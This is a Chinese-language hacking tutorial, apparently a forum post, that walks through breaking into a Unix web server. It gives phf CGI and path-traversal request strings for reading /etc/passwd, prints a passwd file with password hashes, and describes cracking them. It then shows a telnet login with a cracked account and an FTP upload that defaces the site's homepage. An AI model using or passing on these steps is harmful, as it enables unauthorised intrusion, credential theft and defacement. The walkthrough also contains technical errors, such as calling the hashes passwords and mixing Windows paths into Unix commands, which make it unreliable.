今天我给大家带来的是UNIX系统的phf漏洞的攻击方法配合密码强攻来获取系统的最高权限。首先，我们连上Internet,打开红客的网络扫描器：www.google.com （随着google公司对这个搜索引擎的性能的不断提高，到现在可以说扫描一些远程URL漏洞是轻而易举，甚至连信用卡用户的资料都能扫描得到。），Q9750406我们用Google来搜索下列代码： 
/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd 
/cgi-bin/phf.cgi?/etc/passwd 
/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd 

刷的一下，几百个具备这个条件的资料被搜索出来了，真正有这个漏洞的网站并不多，呵呵，我居然找到了几个能用的： 

http://www.hehe.com/cgi-bin/php.cgi?/etc/passwd 


root:abcdefghijklmn:0:0:root:/root:/bin/bash 
bin:*:1:1:bin:/bin: 
daemon:*:2:2:daemon:/sbin: 
adm:*:3:4:adm:/var/adm: 
lp:*:4:7:lp:/var/spool/lpd: 
sync:*:5:0:sync:/sbin:/bin/sync 
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown 
halt:*:7:0:halt:/sbin:/sbin/halt 
mail:*:8:12:mail:/var/spool/mail: 
news:*:9:13:news:/usr/lib/news: 
uucp:*:10:14:uucp:/var/spool/uucppublic: 
operator:*:11:0:operator:/root:/bin/bash 
games:*:12:100:games:/usr/games: 
man:*:13:15:man:/usr/man: 
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash 
nobody:*:-1:100:nobody:/dev/null: 
ftp:*:404:1::/home/ftp:/bin/bash 
guest:*:405:100:guest:/dev/null:/dev/null 
shan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash 
www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash 
test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash 
fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash 
women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash 
kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash 
coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash 
bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash 
carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash 
haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash 
prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash 
tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash 
ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash 
sk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash 
services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash 


什么？不知道这个是什么？有没有搞错！这个就是UNIX系统的密码文档，这里面储存的都是用户账号和密码等资料。如：sk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash 这一段代码就是一个账号为sk的用户的资料，UPrcTmnVSkd3w这个就是sk用户的密码，514是这个用户的用户标识，100是用户的组号，中间的sk表示的是用户的注释，/home/sk这个表示的是用户注册的目录，最后的/bin/bash是用户注册后系统执行的程序名。嘴唇都说干了，喝点Coffee，呵呵！ 
我们在浏览器里打开了这个密码文件，然后我们把这个文件down下来，用小榕兄的乱刀来破解 
。呵呵，设置好乱刀就开始run。没事情干了，呵呵，坐一边去聊天了，不多久，就看到一大排密码被破解出来了，呵呵，很有成就感。 
现在我们用破解出来的账号进入系统： 

telnet www.hehe.com 
SUN OS 5.7 
login: sk 
passwd:xxxxxxx 
#who(看看系统管理员在不在，安全起见) 
sk（呵呵，只有我一个人在） 
（这个用户居然是管理员级别的权限，呵呵，改掉他的主页！） 
#ls 
dev/ proc/ usr/ bin/ etc/ local/ root/ 
var/ boot/ home/ lost+found/ sbin/ 
#cd home/www(通常web页面都是放在home/目录里的) 
#ls 
index.html main.html help.html ...... 

好，我们现在另开一个窗口，把做好的黑页用ftp传上来： 

ftp www.hehe.com 
ftp>put d:\index.html 

切回到原来的窗口，找到我们上传的index.html文件： 
#find . -name “index.html”
index.html（呵呵，就在根目录下） 
#cp index.html \home\www\ 
呵呵，打开浏览器一看，修改成功！